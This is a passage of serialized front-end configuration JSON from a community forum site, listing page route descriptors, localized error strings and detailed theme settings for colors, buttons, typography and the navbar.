deaReplyPage","type":"IDEA_REPLY","urlPath":"/idea/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"UserSettingsPage","type":"USER","urlPath":"/mysettings/:userSettingsTab","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"GroupHubsPage","type":"GROUP_HUB","urlPath":"/groups","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ForumPostPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"OccasionRsvpActionPage","type":"OCCASION","urlPath":"/event/:boardId/:messageSubject/:messageId/rsvp/:responseType","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"VerifyUserEmailPage","type":"USER","urlPath":"/verifyemail/:userId/:verifyEmailToken","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"AllOccasionsPage","type":"OCCASION","urlPath":"/category/:categoryId/events/:boardId/all-events/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"EventBoardPage","type":"EVENT","urlPath":"/category/:categoryId/events/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"TkbReplyPage","type":"TKB_REPLY","urlPath":"/kb/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"IdeaBoardPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"CommunityGuideLinesPage","type":"COMMUNITY","urlPath":"/communityguidelines","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"CaseCreatePage","type":"SALESFORCE_CASE_CREATION","urlPath":"/caseportal/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"TkbEditPage","type":"TKB","urlPath":"/kb/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ForgotPasswordPage","type":"USER","urlPath":"/forgotpassword","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"IdeaEditPage","type":"IDEA","urlPath":"/idea/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"TagPage","type":"COMMUNITY","urlPath":"/tag/:tagName","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"BlogBoardPage","type":"BLOG","urlPath":"/category/:categoryId/blog/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"OccasionMessagePage","type":"OCCASION_TOPIC","urlPath":"/event/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ManageContentPage","type":"COMMUNITY","urlPath":"/managecontent","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ClosedMembershipNodeNonMembersPage","type":"GROUP_HUB","urlPath":"/closedgroup/:groupHubId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"CommunityPage","type":"COMMUNITY","urlPath":"/","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ForumMessagePage","type":"FORUM_TOPIC","urlPath":"/discussions/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"IdeaPostPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"BlogMessagePage","type":"BLOG_ARTICLE","urlPath":"/blog/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"RegistrationPage","type":"USER","urlPath":"/register","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"EditGroupHubPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ForumEditPage","type":"FORUM","urlPath":"/discussions/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ResetPasswordPage","type":"USER","urlPath":"/resetpassword/:userId/:resetPasswordToken","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"TkbMessagePage","type":"TKB_ARTICLE","urlPath":"/kb/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"BlogEditPage","type":"BLOG","urlPath":"/blog/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ManageUsersPage","type":"USER","urlPath":"/users/manage/:tab?/:manageUsersTab?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ForumReplyPage","type":"FORUM_REPLY","urlPath":"/discussions/:boardId/:messageSubject/:messageId/replies/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"PrivacyPolicyPage","type":"COMMUNITY","urlPath":"/privacypolicy","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"NotificationPage","type":"COMMUNITY","urlPath":"/notifications","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"UserPage","type":"USER","urlPath":"/users/:login/:userId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"HealthCheckPage","type":"COMMUNITY","urlPath":"/health","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"OccasionReplyPage","type":"OCCASION_REPLY","urlPath":"/event/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ManageMembersPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/manage/:tab?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"SearchResultsPage","type":"COMMUNITY","urlPath":"/search","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"BlogReplyPage","type":"BLOG_REPLY","urlPath":"/blog/:boardId/:messageSubject/:messageId/replies/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"GroupHubPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"TermsOfServicePage","type":"COMMUNITY","urlPath":"/termsofservice","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"CategoryPage","type":"CATEGORY","urlPath":"/category/:categoryId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ForumViewAllTopicsPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId/all-topics/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"TkbPostPage","type":"TKB","urlPath":"/category/:categoryId/kbs/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"GroupHubPostPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"}],"localOverride":false},"CachedAsset:text:en_US-components/context/AppContext/AppContextProvider-0":{"__typename":"CachedAsset","id":"text:en_US-components/context/AppContext/AppContextProvider-0","value":{"noCommunity":"Cannot find community","noUser":"Cannot find current user","noNode":"Cannot find node with id {nodeId}","noMessage":"Cannot find message with id {messageId}","userBanned":"We're sorry, but you have been banned from using this site.","userBannedReason":"You have been banned for the following reason: {reason}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/Loading/LoadingDot-0":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/Loading/LoadingDot-0","value":{"title":"Loading..."},"localOverride":false},"CachedAsset:theme:customTheme1-1751868366957":{"__typename":"CachedAsset","id":"theme:customTheme1-1751868366957","value":{"id":"customTheme1","animation":{"fast":"150ms","normal":"250ms","slow":"500ms","slowest":"750ms","function":"cubic-bezier(0.07, 0.91, 0.51, 1)","__typename":"AnimationThemeSettings"},"avatar":{"borderRadius":"50%","collections":["custom"],"__typename":"AvatarThemeSettings"},"basics":{"browserIcon":{"imageAssetName":"67445c86d118f03d29f3e02f_Immersive_Favicon-1739352646053.png","imageLastModified":"1739352647623","__typename":"ThemeAsset"},"customerLogo":{"imageAssetName":"Community_Logo_-_Light-1739352757482.png","imageLastModified":"1739352759022","__typename":"ThemeAsset"},"maximumWidthOfPageContent":"1300px","oneColumnNarrowWidth":"800px","gridGutterWidthMd":"30px","gridGutterWidthXs":"10px","pageWidthStyle":"WIDTH_OF_BROWSER","__typename":"BasicsThemeSettings"},"buttons":{"borderRadiusSm":"3px","borderRadius":"3px","borderRadiusLg":"5px","paddingY":"5px","paddingYLg":"7px","paddingYHero":"var(--lia-bs-btn-padding-y-lg)","paddingX":"12px","paddingXLg":"16px","paddingXHero":"60px","fontStyle":"NORMAL","fontWeight":"400","textTransform":"NONE","disabledOpacity":0.5,"primaryTextColor":"var(--lia-bs-body-bg)","primaryTextHoverColor":"var(--lia-bs-body-bg)","primaryTextActiveColor":"var(--lia-bs-body-bg)","primaryBgColor":"var(--lia-bs-primary)","primaryBgHoverColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) * 0.85))","primaryBgActiveColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) * 0.7))","primaryBorder":"1px solid transparent","primaryBorderHover":"1px solid transparent","primaryBorderActive":"1px solid transparent","primaryBorderFocus":"1px solid var(--lia-bs-white)","primaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","secondaryTextColor":"var(--lia-bs-body-color)","secondaryTextHoverColor":"hsl(var(--lia-bs-body-color-h), var(--lia-bs-body-color-s), calc(var(--lia-bs-body-color-l) * 0.95))","secondaryTextActiveColor":"hsl(var(--lia-bs-body-color-h), var(--lia-bs-body-color-s), calc(var(--lia-bs-body-color-l) * 0.9))","secondaryBgColor":"var(--lia-bs-body-bg)","secondaryBgHoverColor":"hsl(var(--lia-bs-body-bg-h), var(--lia-bs-body-bg-s), calc(var(--lia-bs-body-bg-l) * 0.96))","secondaryBgActiveColor":"hsl(var(--lia-bs-body-bg-h), var(--lia-bs-body-bg-s), calc(var(--lia-bs-body-bg-l) * 0.92))","secondaryBorder":"1px solid transparent","secondaryBorderHover":"1px solid transparent","secondaryBorderActive":"1px solid transparent","secondaryBorderFocus":"1px solid transparent","secondaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","tertiaryTextColor":"var(--lia-bs-gray-900)","tertiaryTextHoverColor":"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) * 0.95))","tertiaryTextActiveColor":"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) * 0.9))","tertiaryBgColor":"transparent","tertiaryBgHoverColor":"transparent","tertiaryBgActiveColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.04)","tertiaryBorder":"1px solid transparent","tertiaryBorderHover":"1px solid hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)","tertiaryBorderActive":"1px solid transparent","tertiaryBorderFocus":"1px solid transparent","tertiaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","destructiveTextColor":"var(--lia-bs-body-bg)","destructiveTextHoverColor":"var(--lia-bs-body-bg)","destructiveTextActiveColor":"var(--lia-bs-body-bg)","destructiveBgColor":"var(--lia-bs-danger)","destructiveBgHoverColor":"hsl(var(--lia-bs-danger-h), var(--lia-bs-danger-s), calc(var(--lia-bs-danger-l) * 0.85))","destructiveBgActiveColor":"hsl(var(--lia-bs-danger-h), var(--lia-bs-danger-s), calc(var(--lia-bs-danger-l) * 0.7))","destructiveBorder":"1px solid transparent","destructiveBorderHover":"1px solid transparent","destructiveBorderActive":"1px solid transparent","destructiveBorderFocus":"1px solid transparent","destructiveBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","__typename":"ButtonsThemeSettings"},"border":{"color":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)","mainContent":"LIGHT","sideContent":"LIGHT","radiusSm":"6px","radius":"10px","radiusLg":"18px","radius50":"100vw","__typename":"BorderThemeSettings"},"boxShadow":{"xs":"0 0 0 1px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.08), 0 3px 0 -1px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.08)","sm":"0 2px 4px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.06)","md":"0 5px 15px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.15)","lg":"0 10px 30px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.15)","__typename":"BoxShadowThemeSettings"},"cards":{"bgColor":"var(--lia-panel-bg-color)","borderRadius":"var(--lia-panel-border-radius)","boxShadow":"var(--lia-box-shadow-xs)","__typename":"CardsThemeSettings"},"chip":{"maxWidth":"300px","height":"30px","__typename":"ChipThemeSettings"},"coreTypes":{"defaultMessageLinkColor":"var(--lia-bs-primary)","defaultMessageLinkDecoration":"none","defaultMessageLinkFontStyle":"NORMAL","defaultMessageLinkFontWeight":"400","defaultMessageFontStyle":"NORMAL","defaultMessageFontWeight":"400","defaultMessageFontFamily":"var(--lia-bs-font-family-base)","forumColor":"#26B5E6","forumFontFamily":"var(--lia-bs-font-family-base)","forumFontWeight":"var(--lia-default-message-font-weight)","forumLineHeight":"var(--lia-bs-line-height-base)","forumFontStyle":"var(--lia-default-message-font-style)","forumMessageLinkColor":"var(--lia-default-message-link-color)","forumMessageLinkDecoration":"var(--lia-default-message-link-decoration)","forumMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","forumMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","forumSolvedColor":"#3CA7A1","blogColor":"#3CA7A1","blogFontFamily":"var(--lia-bs-font-family-base)","blogFontWeight":"var(--lia-default-message-font-weight)","blogLineHeight":"1.75","blogFontStyle":"var(--lia-default-message-font-style)","blogMessageLinkColor":"var(--lia-default-message-link-color)","blogMessageLinkDecoration":"var(--lia-default-message-link-decoration)","blogMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","blogMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","tkbColor":"#6E6F7C","tkbFontFamily":"var(--lia-bs-font-family-base)","tkbFontWeight":"var(--lia-default-message-font-weight)","tkbLineHeight":"1.75","tkbFontStyle":"var(--lia-default-message-font-style)","tkbMessageLinkColor":"var(--lia-default-message-link-color)","tkbMessageLinkDecoration":"var(--lia-default-message-link-decoration)","tkbMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","tkbMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","qandaColor":"#4099E2","qandaFontFamily":"var(--lia-bs-font-family-base)","qandaFontWeight":"var(--lia-default-message-font-weight)","qandaLineHeight":"var(--lia-bs-line-height-base)","qandaFontStyle":"var(--lia-default-message-link-font-style)","qandaMessageLinkColor":"var(--lia-default-message-link-color)","qandaMessageLinkDecoration":"var(--lia-default-message-link-decoration)","qandaMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","qandaMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","qandaSolvedColor":"#3FA023","ideaColor":"#FF8000","ideaFontFamily":"var(--lia-bs-font-family-base)","ideaFontWeight":"var(--lia-default-message-font-weight)","ideaLineHeight":"var(--lia-bs-line-height-base)","ideaFontStyle":"var(--lia-default-message-font-style)","ideaMessageLinkColor":"var(--lia-default-message-link-color)","ideaMessageLinkDecoration":"var(--lia-default-message-link-decoration)","ideaMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","ideaMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","contestColor":"#FCC845","contestFontFamily":"var(--lia-bs-font-family-base)","contestFontWeight":"var(--lia-default-message-font-weight)","contestLineHeight":"var(--lia-bs-line-height-base)","contestFontStyle":"var(--lia-default-message-link-font-style)","contestMessageLinkColor":"var(--lia-default-message-link-color)","contestMessageLinkDecoration":"var(--lia-default-message-link-decoration)","contestMessageLinkFontStyle":"ITALIC","contestMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","occasionColor":"#E45C65","occasionFontFamily":"var(--lia-bs-font-family-base)","occasionFontWeight":"var(--lia-default-message-font-weight)","occasionLineHeight":"var(--lia-bs-line-height-base)","occasionFontStyle":"var(--lia-default-message-font-style)","occasionMessageLinkColor":"var(--lia-default-message-link-color)","occasionMessageLinkDecoration":"var(--lia-default-message-link-decoration)","occasionMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","occasionMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","grouphubColor":"#9AE8E8","categoryColor":"#949494","communityColor":"#FFFFFF","productColor":"#949494","__typename":"CoreTypesThemeSettings"},"colors":{"black":"#000000","white":"#FFFFFF","gray100":"#F7F7F7","gray200":"#F7F7F7","gray300":"#E8E8E8","gray400":"#D9D9D9","gray500":"#CCCCCC","gray600":"#949494","gray700":"#707070","gray800":"#545454","gray900":"#333333","dark":"#545454","light":"#F7F7F7","primary":"#4563FF","secondary":"#333333","bodyText":"#10122A","bodyBg":"#F9F9FA","info":"#26B5E6","success":"#3CA7A1","warning":"#FBDC55","danger":"#E45C65","alertSystem":"#FF6600","textMuted":"#707070","highlight":"#FFFCAD","outline":"var(--lia-bs-primary)","custom":["#26B5E6","#E45C65","#6E6F7C","#D7D5E2","#C69A70","#FBDC55","#9AE8E8","#3CA7A1"],"__typename":"ColorsThemeSettings"},"divider":{"size":"3px","marginLeft":"4px","marginRight":"4px","borderRadius":"50%","bgColor":"var(--lia-bs-gray-600)","bgColorActive":"var(--lia-bs-gray-600)","__typename":"DividerThemeSettings"},"dropdown":{"fontSize":"var(--lia-bs-font-size-sm)","borderColor":"var(--lia-bs-border-color)","borderRadius":"var(--lia-bs-border-radius-sm)","dividerBg":"var(--lia-bs-gray-300)","itemPaddingY":"5px","itemPaddingX":"20px","headerColor":"var(--lia-bs-gray-700)","__typename":"DropdownThemeSettings"},"email":{"link":{"color":"#0069D4","hoverColor":"#0061c2","decoration":"none","hoverDecoration":"underline","__typename":"EmailLinkSettings"},"border":{"color":"#e4e4e4","__typename":"EmailBorderSettings"},"buttons":{"borderRadiusLg":"5px","paddingXLg":"16px","paddingYLg":"7px","fontWeight":"700","primaryTextColor":"#ffffff","primaryTextHoverColor":"#ffffff","primaryBgColor":"#0069D4","primaryBgHoverColor":"#005cb8","primaryBorder":"1px solid transparent","primaryBorderHover":"1px solid transparent","__typename":"EmailButtonsSettings"},"panel":{"borderRadius":"5px","borderColor":"#e4e4e4","__typename":"EmailPanelSettings"},"__typename":"EmailThemeSettings"},"emoji":{"skinToneDefault":"#ffcd43","skinToneLight":"#fae3c5","skinToneMediumLight":"#e2cfa5","skinToneMedium":"#daa478","skinToneMediumDark":"#a78058","skinToneDark":"#5e4d43","__typename":"EmojiThemeSettings"},"heading":{"color":"var(--lia-bs-body-color)","fontFamily":"Inter","fontStyle":"NORMAL","fontWeight":"500","h1FontSize":"34px","h2FontSize":"32px","h3FontSize":"28px","h4FontSize":"24px","h5FontSize":"20px","h6FontSize":"16px","lineHeight":"1.3","subHeaderFontSize":"11px","subHeaderFontWeight":"500","h1LetterSpacing":"normal","h2LetterSpacing":"normal","h3LetterSpacing":"normal","h4LetterSpacing":"normal","h5LetterSpacing":"normal","h6LetterSpacing":"normal","subHeaderLetterSpacing":"2px","h1FontWeight":"var(--lia-bs-headings-font-weight)","h2FontWeight":"var(--lia-bs-headings-font-weight)","h3FontWeight":"var(--lia-bs-headings-font-weight)","h4FontWeight":"var(--lia-bs-headings-font-weight)","h5FontWeight":"var(--lia-bs-headings-font-weight)","h6FontWeight":"var(--lia-bs-headings-font-weight)","__typename":"HeadingThemeSettings"},"icons":{"size10":"10px","size12":"12px","size14":"14px","size16":"16px","size20":"20px","size24":"24px","size30":"30px","size40":"40px","size50":"50px","size60":"60px","size80":"80px","size120":"120px","size160":"160px","__typename":"IconsThemeSettings"},"imagePreview":{"bgColor":"var(--lia-bs-gray-900)","titleColor":"var(--lia-bs-white)","controlColor":"var(--lia-bs-white)","controlBgColor":"var(--lia-bs-gray-800)","__typename":"ImagePreviewThemeSettings"},"input":{"borderColor":"var(--lia-bs-gray-600)","disabledColor":"var(--lia-bs-gray-600)","focusBorderColor":"var(--lia-bs-primary)","labelMarginBottom":"10px","btnFontSize":"var(--lia-bs-font-size-sm)","focusBoxShadow":"0 0 0 3px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","checkLabelMarginBottom":"2px","checkboxBorderRadius":"3px","borderRadiusSm":"var(--lia-bs-border-radius-sm)","borderRadius":"var(--lia-bs-border-radius)","borderRadiusLg":"var(--lia-bs-border-radius-lg)","formTextMarginTop":"4px","textAreaBorderRadius":"var(--lia-bs-border-radius)","activeFillColor":"var(--lia-bs-primary)","__typename":"InputThemeSettings"},"loading":{"dotDarkColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.2)","dotLightColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l), 0.5)","barDarkColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.06)","barLightColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l), 0.4)","__typename":"LoadingThemeSettings"},"link":{"color":"var(--lia-bs-primary)","hoverColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) - 10%))","decoration":"none","hoverDecoration":"underline","__typename":"LinkThemeSettings"},"listGroup":{"itemPaddingY":"15px","itemPaddingX":"15px","borderColor":"var(--lia-bs-gray-300)","__typename":"ListGroupThemeSettings"},"modal":{"contentTextColor":"var(--lia-bs-body-color)","contentBg":"var(--lia-bs-white)","backgroundBg":"var(--lia-bs-black)","smSize":"440px","mdSize":"760px","lgSize":"1080px","backdropOpacity":0.3,"contentBoxShadowXs":"var(--lia-bs-box-shadow-sm)","contentBoxShadow":"var(--lia-bs-box-shadow)","headerFontWeight":"700","__typename":"ModalThemeSettings"},"navbar":{"position":"FIXED","background":{"attachment":null,"clip":null,"color":"var(--lia-bs-white)","imageAssetName":"","imageLastModified":"0","origin":null,"position":"CENTER_CENTER","repeat":"NO_REPEAT","size":"COVER","__typename":"BackgroundProps"},"backgroundOpacity":0.8,"paddingTop":"15px","paddingBottom":"15px","borderBottom":"1px solid var(--lia-bs-border-color)","boxShadow":"var(--lia-bs-box-shadow-sm)","brandMarginRight":"30px","brandMarginRightSm":"10px","brandLogoHeight":"30px","linkGap":"10px","linkJustifyContent":"flex-start","linkPaddingY":"5px","linkPaddingX":"10px","linkDropdownPaddingY":"9px","linkDropdownPaddingX":"var(--lia-nav-link-px)","linkColor":"var(--lia-bs-body-color)","linkHoverColor":"var(--lia-bs-primary)","linkFontSize":"var(--lia-bs-font-size-sm)","linkFontStyle":"NORMAL","linkFontWeight":"400","linkTextTransform":"NONE","linkLetterSpacing":"normal","linkBorderRadius":"var(--lia-bs-border-radius-sm)","linkBgColor":"transparent","linkBgHoverColor":"transparent","linkBorder":"none","linkBorderHover":"none","linkBoxShadow":"none","linkBoxShadowHover":"none","linkTextBorderBottom":"none","linkTextBorderBottomHover":"none","dropdownPaddingTop":"10px","dropdownPaddingBottom":"15px","dropdownPaddingX":"10px","dropdownMenuOffset":"2px","dropdownDividerMarginTop":"10px","dropdownDividerMarginBottom":"10px","dropdownBorderColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)","controllerBgHoverColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.1)","controllerIconColor":"var(--lia-bs-body-color)","controllerIconHoverColor":"var(--lia-bs-body-color)","controllerTextColor":"var(--lia-nav-controller-icon-color)","controllerTextHoverColor":"var(--lia-nav-controller-icon-hover-color)","controllerHighlightColor":"hsla(30, 100%, 50%)","controllerHighlightTextColor":"var(--lia-yiq-light)","controllerBorderRadius":"var(--lia-border-radius-50)","hamburgerColor":"var(--lia-nav-controller-icon-color)","hamburgerHoverColor":"var(--lia-nav-controller-icon-color)","hamburgerBgColor":"transparent","hamburgerBgHoverColor":"transparent","hamburgerBorder":"none","hamburgerBorderHover":"none","collapseMenuMarginLeft":"20px","collapseMenuDividerBg":"var(--lia-nav-link-color)","collapseMenuDividerOpacity":0.16,"__typename":"NavbarThemeSettings"},"pager":{"textColor":"var(--lia-bs-link-color)","textFontWeight":"var(--lia-font-weight-md)","textFontSize":"var(--lia-bs-font-size-sm)","__typename":"PagerThemeSettings"},"panel":{"bgColor":"var(--lia-bs-white)","borderRadius":"var(--lia-bs-border-radius)","borderColor":"var(--lia-bs-border-color)","boxShadow":"none","__typename":"PanelThemeSettings"},"popover":{"arrowHeight":"8px","arrowWidth":"16px","maxWidth":"300px","minWidth":"100px","headerBg":"var(--lia-bs-white)","borderColor":"var(--lia-bs-border-color)","borderRadius":"var(--lia-bs-border-radius)","boxShadow":"0 0.5rem 1rem hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.15)","__typename":"PopoverThemeSettings"},"prism":{"color":"#000000","bgColor":"#f5f2f0","fontFamily":"var(--font-family-monospace)","fontSize":"var(--lia-bs-font-size-base)","fontWeightBold":"var(--lia-bs-font-weight-bold)","fontStyleItalic":"italic","tabSize":2,"highlightColor":"#b3d4fc","commentColor":"#62707e","punctuationColor":"#6f6f6f","namespaceOpacity":"0.7","propColor":"#990055","selectorColor":"#517a00","operatorColor":"#906736","operatorBgColor":"hsla(0, 0%, 100%, 0.5)","keywordColor":"#0076a9","functionColor":"#d3284b","variableColor":"#c14700","__typename":"PrismThemeSettings"},"rte":{"bgColor":"var(--lia-bs-white)","borderRadius":"var(--lia-panel-border-radius)","boxShadow":" 